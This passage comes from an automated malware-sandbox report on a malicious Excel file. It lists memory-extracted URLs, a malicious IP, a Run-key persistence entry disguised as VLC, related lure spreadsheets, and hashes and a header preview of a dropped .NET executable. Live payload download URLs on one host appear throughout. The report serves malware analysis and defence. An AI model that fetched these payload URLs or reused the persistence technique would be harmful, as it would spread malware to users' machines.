                    http://fontfabrik.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnpoftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sakkal.comooftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designersG6oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      		high
                      http://www.ascendercorp.com/typedesigners.html:oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.urwpp.deocSoftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.coma77oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.comldvaoftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comRoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleaseoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnn-uoftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fonts.comoftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          		high
                          http://www.sandoll.co.kroftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleaseoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comcoftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.zhongyicts.com.cnoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmpfalse
                            		high
                            http://www.sakkal.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deXoftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmljoftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comeguoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://sparepartiran.com/js/2Q/5901777.pdf.exe0yROpowershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://en.wikipoftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/I7softmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.founder.com.cn/cn/oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cnoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            		high
                                            http://sparepartiran.com/js/2Q/5901777.pdf.exeerspowershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://sparepartiran.cpowershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.monotype.oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/Kurst7Doftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                              		high
                                              http://sparepartiran.comxpowershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/S7oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.223.88.131
                                              		unknownUnited States
                                              		19084COLOUPUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:323692
                                              Start date:27.11.2020
                                              Start time:11:35:45
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:5901777.xls
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Run name:Potential for more IOCs and behavior
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winXLS@16/12@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 3.9% (good quality ratio 3.8%)
                                              • Quality average: 78.1%
                                              • Quality standard deviation: 26%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 233
                                              • Number of non-executed functions: 200
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xls
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 52.109.76.68, 52.109.8.24, 51.11.168.160, 104.42.151.234, 95.101.184.67, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:38:01API Interceptor367x Sleep call for process: splwow64.exe modified
                                              11:38:06API Interceptor77x Sleep call for process: powershell.exe modified
                                              11:38:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
                                              11:38:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              162.223.88.131Hm0L8.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                                              5080132.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Yvvtz1.exe
                                              633307.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Wzdgpx2.exe
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                                              4640578.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                                              6021557.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/SDJ-0488.exe
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/411.exe
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/11056.jpg
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/SD-1061.jpg
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/zz1ecco.jpg

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              sparepartiran.comHm0L8.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              5080132.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              633307.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              4640578.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              6021557.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              COLOUPUSHm0L8.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              5080132.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              633307.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              4640578.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              6021557.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\Public\oftmhayq.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oftmhayq.exe.log
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):5.344111348947579
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                              MD5:E87C60A24438CC611338EA5ACB433A0A
                                              SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                              SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                              SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AC884895-1FFB-4FFD-9AEA-0EAADDCF8F32
                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):129952
                                              Entropy (8bit):5.378326234389065
                                              Encrypted:false
                                              SSDEEP:1536:mcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:0mQ9DQW+zBX8u
                                              MD5:DF0C880894C2F78E9AD029585FF4FCA7
                                              SHA1:77216174BF47B52075FDB840151377A6682CD90E
                                              SHA-256:284F18BFBB35013569813423ECE460368B4AE64FD5631B444BB8B82F7FC72BD8
                                              SHA-512:2058245A6AFF413CC97265F041A3690D5CE19F3522320ECD468602CA5BC35393AEE9C925065111629180275581B808B63D7D3B42207DDE95F2A98BF1924D16E0
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-27T10:36:40">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.9260988789684415
                                              Encrypted:false
                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: @...e................................................@..........
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgkruib0.ygj.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eynwfcx2.3ju.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljxb34qx.vzy.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryxuahqv.3dg.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
